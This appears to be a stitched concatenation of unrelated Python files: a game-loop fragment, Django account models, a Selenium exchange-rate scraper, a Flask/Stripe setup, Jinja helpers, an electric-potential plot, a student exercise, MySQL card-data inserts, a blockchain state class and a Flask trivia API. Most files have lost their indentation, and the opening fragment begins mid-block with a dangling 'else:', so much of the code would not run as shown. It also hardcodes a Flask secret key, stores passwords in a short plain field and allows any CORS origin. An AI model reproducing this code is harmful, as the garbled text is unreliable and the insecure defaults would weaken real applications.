if direction == 180:  # left
    if runDirection.left() is False:
        pass
if direction == 0:  # right
    if runDirection.right() is False:
        pass
else:
for x in 'quitting...':
time.sleep(0.1)
print(x, sep='', end='', flush=True)
time.sleep(1.2)
Enter()
|
from django.db import models
# Create your models here.
class UserProfile(models.Model):
username = models.CharField(max_length=11, verbose_name='username', unique=True)
password = models.CharField(max_length=32, verbose_name='password')
email = models.EmailField()
phone = models.CharField(max_length=11, verbose_name='phone number')
isActive = models.BooleanField(default=False, verbose_name='is active')
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'user_profile'
def __str__(self):
return '%s_%s' %(self.username, self.isActive)
class WeiBoUser(models.Model):
uid = models.OneToOneField(UserProfile, null=True, on_delete=models.SET_NULL)  # one-to-one
wuid = models.CharField(max_length=50, db_index=True)  # indexed
access_token = models.CharField(max_length=100)
class Meta:
db_table = 'weibo_user'
def __str__(self):
return '%s_%s'%(self.uid,self.wuid)
class account(models.Model):
# Note: IntegerField does not accept max_length, so the length limits
# stay only on the CharFields where they apply
user_id = models.IntegerField(verbose_name='user id', unique=True)
name = models.CharField(max_length=11, verbose_name='name')
id_card = models.CharField(max_length=18, verbose_name='ID card number', unique=True)
bank_id = models.IntegerField(verbose_name='bank')
bank_no = models.CharField(max_length=19, verbose_name='bank card number')
addr = models.CharField(max_length=1024, verbose_name='residential address', default='')
is_opened = models.IntegerField(verbose_name='account opened', default=0)
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'account'
def __str__(self):
return '%s_%s' %(self.name, self.id_card)
|
from selenium import webdriver
import ctypes
class OpenFile:
    def __init__(self, file_name: str, mode: str):
        # Snapshot the current content so __exit__ can restore it on error
        try:
            with open(file_name, 'r') as tmp_file:
                self.__tmp_file_content = tmp_file.read()
        except FileNotFoundError:
            self.__tmp_file_content = ''
        self.__tmp_filename = file_name
        try:
            self.file_obj = open(file_name, mode)
        except FileNotFoundError:
            self.file_obj = open(file_name, 'w')
def __exit__(self, exc_type, exc_val, exc_tb):
self.file_obj.close()
if exc_type is None:
return True
tmp_file = open(self.__tmp_filename, 'w')
tmp_file.write(self.__tmp_file_content)
tmp_file.close()
return True
def __enter__(self):
return self.file_obj
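# Minimal usage sketch: __exit__ always returns True, so an exception raised
# inside the block is swallowed and the file content is restored from the
# snapshot taken in __init__ ('ex.txt' is the file this script maintains;
# the row written below is illustrative):
def _demo_openfile():
    with OpenFile('ex.txt', 'a') as f:
        f.write('USD/UAH,01/01/2024,37.0000\n')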
class CurrencyExchange:
def __init__(self, this_currency: str, another_currency: str):
self.this_currency = this_currency
self.another_currency = another_currency
self.data_from_source: list
self.driver: webdriver
def create_url(self):
return f'https://exchangerates.org.uk/{self.this_currency}-{self.another_currency}-exchange-rate-history.html'
def open_driver_and_get_data(self):
self.driver = webdriver.Chrome()
self.driver.set_window_position(-2000, 0)
self.driver.get(self.create_url())
table_row = self.driver.find_elements_by_xpath('//*[@id="hd-maintable"]')
data = [[td.text for td in row.find_elements_by_class_name('colone') + row.find_elements_by_class_name('coltwo')] for row in table_row][0]
self.data_from_source = [f'{self.this_currency}/{self.another_currency},{a[-10:]},{a[a.find(f"{self.this_currency} = ") + 6:][:7]}' for a in data]
# self.data_from_source.sort()
def create_str_from_list(lst_to_str: list) -> str:
"""
create and return string, which return all values from list
:param lst_to_str: must be list type
:return: return str
"""
return ''.join(map(lambda x: '\n' + x, lst_to_str))[1:]
def refresh_data(currency_instance: CurrencyExchange, file_to_refresh_data: str):
currency_instance.open_driver_and_get_data()
with OpenFile(file_to_refresh_data, 'r') as file:
data_in_file = list(map(lambda x: x.replace("\n", ""), file.readlines()))
# data_in_file.sort()
with OpenFile(file_to_refresh_data, 'w') as file:
result_lst = data_in_file + list(set(currency_instance.data_from_source) - set(data_in_file))
# result_lst.sort()
file.write(create_str_from_list(result_lst))
currency_instance.driver.quit()
try:
    usd_uah = CurrencyExchange('USD', 'UAH')
    eur_uah = CurrencyExchange('EUR', 'UAH')
    for i in (usd_uah, eur_uah):
        refresh_data(i, 'ex.txt')
    ctypes.windll.user32.MessageBoxW(0, 'Done', 'Currency rate update', 1)
except Exception:
    ctypes.windll.user32.MessageBoxW(0, 'An error occurred! The file was not changed', 'Currency rate update', 1)
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import func
from flask_bcrypt import Bcrypt
from flask_migrate import Migrate
import stripe
import os
app = Flask(__name__)
stripe_keys = {
"secret_key": os.environ['STRIPE_SECRET_KEY'],
"publishable_key": os.environ['STRIPE_PUBLISHABLE_KEY']
}
stripe.api_key = stripe_keys['secret_key']
app.config['UPLOAD_FOLDER'] = './static/images/uploads'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///user_dash.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = "LOL"
bcrypt = Bcrypt(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from functools import wraps
from werkzeug.wrappers import Response
from jinja2 import Environment, FileSystemLoader
template_path = os.path.join(os.path.dirname(__file__), 'templates')
jinja_env = Environment(loader=FileSystemLoader(template_path), autoescape=True)
def render_template(template_name, **context):
t = jinja_env.get_template(template_name)
return Response(t.render(context), mimetype='text/html')
def template(template_name):
    def renderer(func):
        @wraps(func)
        def wrapper(request, *args, **kwargs):
            context = func(request, *args, **kwargs)
            if not isinstance(context, dict):
                return context
            return render_template(template_name, **context)
        return wrapper
    return renderer
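# Usage sketch (hypothetical handler; 'index.html' stands in for a file in
# the templates/ directory). Returning a dict renders the template with that
# context; returning anything else (e.g. a Response) passes through unchanged:
@template('index.html')
def index(request):
    return {'title': 'Hello'}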
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 24 21:30:41 2020
@author: shaun
"""
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import plotly.express as px
import plotly.graph_objects as go
def round_sig(x, sig):
    # floor and log10 come from numpy; the originals were never imported
    return round(x, sig - int(np.floor(np.log10(abs(x)))) - 1)
# a function to calculate the distance from a point in a grid
def distance(x, y, point, boxsize):
    # x and y components of r squared
    rx = (x - point[0])**2
    ry = (y - point[1])**2
    r = (rx + ry)**0.5
    # convert r from grid units to meters using the bin size
    r = r * boxsize
    # avoid returning exactly zero at a charge location, which would
    # raise ZeroDivisionError in the potential calculation
    return max(r, boxsize * 1e-6)
# make the matrix size odd so that the center is easy to find
N=101
#define the space to be from -0.5 meters to 0.5 meters in x and y
x=np.linspace(-0.5,0.5,N)
y=np.linspace(0.5,-0.5,N)
# create matrices: A holds the raw potentials; Aplot is a clamped copy used for visualization
A=np.empty([N,N],float)
Aplot=np.empty([N,N],float)
#center of the matrix
center=(N-1)/2
#in meters
#sets the size of each grid in matrix A
boxsize=abs(x[0]-x[1])
#sets the location of the positive charge
a=np.array([center-(0.05/boxsize),center],float)
#sets the location of the negative charge
b=np.array([center+(0.05/boxsize),center],float)
# permittivity of free space
e=8.85418782*(10**(-12))
#limit of acceptable potentials
limit=1e+010
# fill the matrix with the potential at each point in the grid
for row in range(0,N):
for col in range(0,N):
potentiala=1/(4.0*np.pi*e*(distance(row,col,a,boxsize)))
potentialb=-1/(4.0*np.pi*e*(distance(row,col,b,boxsize)))
A[row][col]=(potentiala+potentialb)
if((potentiala+potentialb)<-limit ):
Aplot[row][col]=-limit
elif((potentiala+potentialb)>limit):
Aplot[row][col]=limit
else:
Aplot[row][col]=(potentiala+potentialb)
#plot the heat map
fig = go.Figure(data=go.Heatmap(
z=Aplot,
x=x,
y=y,
hoverongaps = False)
)
fig.update_layout(
xaxis_title="X meters",
yaxis_title="Y meters",
title='Electric Potential of two point charges'
)
fig.show()
# take the gradient of Aplot to get the electric field for the quiver plot
v, u = np.gradient(Aplot, boxsize, boxsize)
figure1=plt.figure()
ax = figure1.add_subplot()
ax.set_xlabel("X meters")
ax.set_ylabel("Y meters")
q = ax.quiver(x, y, u, v)
figure1.suptitle("Eletric Field of 2 point charges")
plt.show()
|
# part - 1 [Take variables with values of different types]
Name = "sara"
Age = 20
College = "Bhavans women college"
Height = 5.5
Obesity = False
# part - 2 [Print these in different lines and with appropriate messages (use .format()]
print("My name is {}.".format(Name))
print("I am {} years old.".format(Age))
print("I am from {}.".format(College))
print("My height is {}inches.".format(Height))
print("I have obesity : {}".format(Obesity))
# part - 3 [Real world example of variable apart from which i gave in class]
"""
Variables are quantities that don't have a fixed value,
for example:
1. Distance and time during a trip.
2. Wages earned for the hours worked by a labourer.
3. Daily temperature, which changes with the climate.
"""
|
import pymysql.cursors
# Connection credentials below are placeholders; substitute your own values
connection = pymysql.connect(host='hostname',
                             user='username',
                             password='password',
                             db='dbname',
                             charset='utf8',
                             cursorclass=pymysql.cursors.DictCursor)
try:
with connection.cursor() as cursor:
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Aggressive Instinct','[\\'green\\']','[]','','Target creature you control deals damage equal" \
" to its power to target creature you don’t control.','26','sorcery','2','','','','0','');"
cursor.execute(sql)
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Ancestor Dragon','[\\'white\\']','[]','Dragon','Flying\n" \
"Whenever one or more creatures you control attack, you gain 1 life for each attacking creature.'" \
",'144','creature','6','5','6','','0','');"
cursor.execute(sql)
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Armored Whirl Turtle','[\\'blue\\']','[]','Turtle','','20','creature','3','0','5','','0','');"
cursor.execute(sql)
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Breath of Fire','[\\'red\\']','[]','','Breath of Fire deals 2 damage to target creature.'," \
"'22','instant','2','','','','0','');"
cursor.execute(sql)
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Cleansing Screech','[\\'red\\']','[]',''," \
"'Cleansing Screech deals 4 damage to any target.','176','sorcery','5','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Colorful Feiyi Sparrow','[\\'white\\']','[]','Bird'," \
"'Flying','6','creature','2','1','3','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Confidence from Strength','[\\'green\\']','[]',''," \
"'Target creature gets +4/+4 and gains trample until end of turn.','52','sorcery','3','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Dragon\\'s Presence','[\\'white\\']','[]',''," \
"'Dragon’s Presence deals 5 damage to target attacking or blocking creature.','12','instant','3','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Drown in Shapelessness','[\\'blue\\']','[]',''," \
"'Return target creature to its owner’s hand.','10','instant','2','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Earth-Origin Yak','[\\'white\\']','[]','Ox'," \
"'When Earth-Origin Yak enters the battlefield, creatures you control get +1/+1 until end of turn.'," \
"'24','creature','4','2','4','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Earthshaking Si','[\\'green\\']','[]','Beast'," \
"'Trample','416','creature','6','5','5','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Feiyi Snake','[\\'green\\']','[]','Snake'," \
"'Reach','26','creature','2','2','1','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Ferocious Zheng','[\\'green\\']','[]','Cat・Beast'," \
"'','676','creature','4','4','4','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Fire-Omen Crane','[\\'red\\']','[]','Bird・Spirit'," \
"'Flying\nWhenever Fire-Omen Crane attacks, it deals 1 damage to target creature an opponent controls.'," \
"'968','creature','5','3','3','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Hardened-Scale Armor','[\\'green\\']','[]','Aura'," \
"'Enchant creature\nEnchanted creature gets +3/+3.','52','enchantment','3','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Heavenly Qilin','[\\'white\\']','[]','Kirin'," \
"'Flying\nWhenever Heavenly Qilin attacks, another target creature you control gains flying until" \
" end of turn.','12','creature','3','2','2','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Jiang Yanggu','[\\'green\\']','[legendary]','Yanggu'," \
"'+1: Target creature gets +2/+2 until end of turn.\n" \
"−1: If you don’t control a creature named Mowu, create a legendary 3/3 green Hound creature token named Mowu.\n" \
"−5: Until end of turn, target creature gains trample and gets +X/+X, where X is the number of lands you control.'," \
"'208','planeswalker','5','','','','0','4');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Journey for the Elixir','[\\'green\\']','[]',''," \
"'Search your library and graveyard for a basic land card and a card named Jiang Yanggu, reveal them," \
" put them into your hand, then shuffle your library.','52','sorcery','3','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Leopard-Spotted Jiao','[\\'red\\']','[]','Beast'," \
"'','26','creature','2','3','1','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Moon-Eating Dog','[\\'blue\\']','[]','Hound'," \
"'As long as you control a Yanling planeswalker, Moon-Eating Dog has flying.'," \
"'40','creature','4','3','3','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Mu Yanling','[\\'blue\\']','[legendary]','Yanling'," \
"'+2: Target creature can’t be blocked this turn.\n−3: Draw two cards.\n" \
"−10: Tap all creatures your opponents control. You take an extra turn after this one.'," \
"'400','planeswalker','6','','','','0','5');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Nine-Tail White Fox','[\\'blue\\']','[]','Fox・Spirit'," \
"'Whenever Nine-Tail White Fox deals combat damage to a player, draw a card.'," \
"'20','creature','3','2','2','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Purple-Crystal Crab','[\\'blue\\']','[]','Crab'," \
"'When Purple-Crystal Crab dies, draw a card.'," \
"'10','creature','2','1','1','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Qilin\\'s Blessing','[\\'white\\']','[]','','Target creature gets +2/+2 until end of turn.'," \
"'3','instant','1','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Reckless Pangolin','[\\'green\\']','[]','Pangolin'," \
"'Whenever Reckless Pangolin attacks, it gets +1/+1 until end of turn.'," \
"'52','creature','3','2','2','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Rhythmic Water Vortex','[\\'blue\\']','[]',''," \
"'Return up to two target creatures to their owner’s hand.\n" \
"Search your library and/or graveyard for a card named Mu Yanling, reveal it, and put it into your hand. " \
"If you searched your library this way, shuffle it.','200','sorcery','5','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Sacred White Deer','[\\'green\\']','[]','Elk'," \
"'{3}{G}, {T}: You gain 4 life. Activate this ability only if you control a Yanggu planeswalker.'," \
"'26','creature','2','2','2','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Screeching Phoenix','[\\'red\\']','[]','Phoenix'," \
"'Flying\n{2}{R}: Creatures you control get +1/+0 until end of turn.'," \
"'1936','creature','6','4','4','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Stormcloud Spirit','[\\'blue\\']','[]','Spirit'," \
"'Flying','200','creature','5','4','4','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Vivid Flying Fish','[\\'blue\\']','[]','Fish・Lizard'," \
"'Vivid Flying Fish has flying as long as it’s attacking.','10','creature','2','1','1','','0','');"
cursor.execute(sql)
connection.commit()
finally:
connection.close()
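# --- Hedged sketch (added for illustration, not part of the original script): the
# inserts above build each SQL statement by hand, which forces manual quote
# escaping. With a parameterized query the driver escapes values itself (the %s
# placeholder style assumes a PyMySQL-like driver; `insert_card` is a hypothetical
# helper name).
def insert_card(cursor, row):
    sql = ("insert into fixed_card_data (name,color,supertype,subtype,text,cost,"
           "cardtype,cmc,power,toughness,redirect_name,redirect_id,loyalty) "
           "values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)")
    cursor.execute(sql, row)
# Example, equivalent to the hand-built 'Stormcloud Spirit' insert above:
# insert_card(cursor, ('Stormcloud Spirit', "['blue']", '[]', 'Spirit', 'Flying',
#                      '200', 'creature', '5', '4', '4', '', '0', ''))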
|
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
from addressing.b4e_addressing import addresser
from protobuf.b4e_protobuf import actor_pb2
from protobuf.b4e_protobuf import record_pb2
from protobuf.b4e_protobuf import b4e_environment_pb2
from protobuf.b4e_protobuf import class_pb2
from protobuf.b4e_protobuf import voting_pb2
import logging
LOGGER = logging.getLogger(__name__)
class B4EState(object):
def __init__(self, context, timeout=10):
self._context = context
self._timeout = timeout
def get_b4e_environment(self):
try:
address = addresser.ENVIRONMENT_ADDRESS
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = b4e_environment_pb2.B4EEnvironmentContainer()
container.ParseFromString(state_entries[0].data)
for environment in container.entries:
return environment
return None
except Exception as e:
print("Err :", e)
return None
def set_b4e_environment(self, transaction_id):
"""Creates a new agent in state
Args:
"""
environment = b4e_environment_pb2.B4EEnvironment(institution_number=0, transaction_id=transaction_id)
environment_address = addresser.ENVIRONMENT_ADDRESS
container = b4e_environment_pb2.B4EEnvironmentContainer()
state_entries = self._context.get_state(
addresses=[environment_address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([environment])
data = container.SerializeToString()
updated_state = {}
updated_state[environment_address] = data
response_address = self._context.set_state(updated_state, timeout=self._timeout)
def add_one_b4e_environment(self, transaction_id):
address = addresser.ENVIRONMENT_ADDRESS
container = b4e_environment_pb2.B4EEnvironmentContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for env in container.entries:
env.institution_number += 1
env.transaction_id = transaction_id
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def get_actor(self, public_key):
try:
address = addresser.get_actor_address(public_key)
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = actor_pb2.ActorContainer()
container.ParseFromString(state_entries[0].data)
for actor in container.entries:
if actor.actor_public_key == public_key:
return actor
return None
except Exception as e:
print("Err :", e)
return None
def set_actor(self, actor, public_key):
"""Creates a new agent in state
Args:
"""
actor_address = addresser.get_actor_address(public_key)
container = actor_pb2.ActorContainer()
state_entries = self._context.get_state(
addresses=[actor_address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([actor])
data = container.SerializeToString()
updated_state = {}
updated_state[actor_address] = data
response_address = self._context.set_state(updated_state, timeout=self._timeout)
def set_active_actor(self, public_key):
address = addresser.get_actor_address(public_key)
container = actor_pb2.ActorContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for actor in container.entries:
if actor.actor_public_key == public_key:
actor.status = actor_pb2.ACTIVE
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def set_reject_actor(self, public_key):
address = addresser.get_actor_address(public_key)
container = actor_pb2.ActorContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for actor in container.entries:
if actor.actor_public_key == public_key:
actor.status = actor_pb2.REJECT
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def get_voting(self, public_key):
try:
address = addresser.get_voting_address(public_key)
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = voting_pb2.VotingContainer()
container.ParseFromString(state_entries[0].data)
for voting in container.entries:
if voting.elector_public_key == public_key:
return voting
return None
except Exception as e:
print("Err :", e)
return None
def set_voting(self, voting, public_key):
voting_address = addresser.get_voting_address(public_key)
container = voting_pb2.VotingContainer()
state_entries = self._context.get_state(
addresses=[voting_address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([voting])
data = container.SerializeToString()
updated_state = {}
updated_state[voting_address] = data
response_address = self._context.set_state(updated_state, timeout=self._timeout)
def update_voting(self, public_key, vote_result, vote, timestamp):
address = addresser.get_voting_address(public_key)
container = voting_pb2.VotingContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for voting in container.entries:
if voting.elector_public_key == public_key:
voting.vote.extend([vote])
voting.close_vote_timestamp = timestamp
voting.vote_result = vote_result
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def get_class(self, class_id, institution_public_key):
try:
address = addresser.get_class_address(class_id, institution_public_key)
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = class_pb2.ClassContainer()
container.ParseFromString(state_entries[0].data)
for class_ in container.entries:
if class_.class_id == class_id:
return class_
return None
except Exception as e:
print("Err :", e)
return None
def set_class(self, class_id, class_):
class_address = addresser.get_class_address(class_id, class_.institution_public_key)
container = class_pb2.ClassContainer()
state_entries = self._context.get_state(
addresses=[class_address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([class_])
data = container.SerializeToString()
updated_state = {}
updated_state[class_address] = data
response_address = self._context.set_state(updated_state, timeout=self._timeout)
def get_record(self, record_id, owner_public_key, manager_public_key):
try:
address = addresser.get_record_address(record_id, owner_public_key, manager_public_key)
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = record_pb2.RecordContainer()
container.ParseFromString(state_entries[0].data)
for record in container.entries:
if record.record_id == record_id:
return record
return None
except Exception as e:
print("Err :", e)
return None
def set_record(self, record_id, record):
address = addresser.get_record_address(record_id, record.owner_public_key, record.manager_public_key)
container = record_pb2.RecordContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([record])
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def update_record(self, record_id, owner_public_key, manager_public_key, record_data, active, timestamp,
transaction_id):
new_data = record_pb2.Record.RecordData(
record_data=record_data,
active=active,
timestamp=timestamp,
transaction_id=transaction_id
)
address = addresser.get_record_address(record_id, owner_public_key, manager_public_key)
container = record_pb2.RecordContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for record in container.entries:
if record.record_id == record_id:
record.record_data.extend([new_data])
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def update_actor_info(self, actor_public_key, info):
address = addresser.get_actor_address(actor_public_key)
container = actor_pb2.ActorContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for actor in container.entries:
if actor.actor_public_key == actor_public_key:
actor.info.extend([info])
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
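    # --- Hedged sketch (added for illustration, not in the original file): every
    # setter above repeats the same read-parse-mutate-serialize-write cycle against
    # self._context. A helper such as this hypothetical `_update_container` method
    # factors that cycle out:
    def _update_container(self, address, container, mutate):
        """Load the container at `address`, apply `mutate(container)`, write it back."""
        state_entries = self._context.get_state(addresses=[address], timeout=self._timeout)
        if state_entries:
            container.ParseFromString(state_entries[0].data)
        mutate(container)
        self._context.set_state({address: container.SerializeToString()}, timeout=self._timeout)
    # set_actor, for example, would reduce to:
    # self._update_container(addresser.get_actor_address(public_key),
    #                        actor_pb2.ActorContainer(),
    #                        lambda c: c.entries.extend([actor]))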
|
import os
from flask import Flask, request, abort, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
import random
from models import setup_db, Question, Category
QUESTIONS_PER_PAGE = 10
def paginate_questions(request, selection):
page = request.args.get('page', 1, type=int)
start = (page - 1) * QUESTIONS_PER_PAGE
end = start + QUESTIONS_PER_PAGE
questions = [question.format() for question in selection]
current_questions = questions[start:end]
return current_questions
class AbortError(Exception):
def __init__(self, code):
self.code = code
def create_app(test_config=None):
# create and configure the app
app = Flask(__name__)
setup_db(app)
CORS(app)
@app.after_request
def after_request(response):
        response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/categories')
def retrieve_categories():
categories = {category.id: category.type for
category in Category.query.all()}
if len(categories) == 0:
abort(404)
obj = jsonify({
'success': True,
'categories': categories
})
return obj
@app.route('/questions')
def retrieve_questions():
selection = Question.query.order_by(Question.id).all()
current_questions = paginate_questions(request, selection)
categories = {category.id: category.type for category in
Category.query.all()}
if len(current_questions) == 0:
abort(404)
return jsonify({
'success': True,
'questions': current_questions,
'total_questions': len(Question.query.all()),
"categories": categories,
"current_category": None,
})
@app.route('/questions/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
try:
question_query = Question.query.filter(Question.id == question_id)
question = question_query.one_or_none()
if question is None:
raise AbortError(404)
question.delete()
return jsonify({
'success': True,
'deleted': question_id,
'total_questions': len(Question.query.all())
})
except AbortError as e:
abort(e.code)
except Exception:
abort(422)
@app.route('/questions', methods=['POST'])
def create_question():
body = request.get_json()
if body is None:
abort(422)
search_term = body.get('searchTerm')
try:
if search_term:
selection = Question.query.order_by(Question.id).filter(
Question.question.ilike('%{}%'.format(search_term)))
current_questions = paginate_questions(request, selection)
if len(current_questions) == 0:
raise AbortError(404)
return jsonify({
'success': True,
'questions': current_questions,
'total_questions': len(selection.all()),
'current_category': None
})
else:
new_title = body.get('question', None)
if new_title is None:
raise AbortError(404)
new_answer = body.get('answer', None)
if new_answer is None:
raise AbortError(404)
new_difficulty = body.get('difficulty', None)
if new_difficulty is None:
raise AbortError(404)
new_category = body.get('category', None)
if new_category is None:
raise AbortError(404)
question = Question(new_title, new_answer,
new_category, new_difficulty)
question.insert()
return jsonify({
'success': True,
'created': question.id,
'total_questions': len(Question.query.all())
})
except AbortError as e:
abort(e.code)
except Exception:
abort(422)
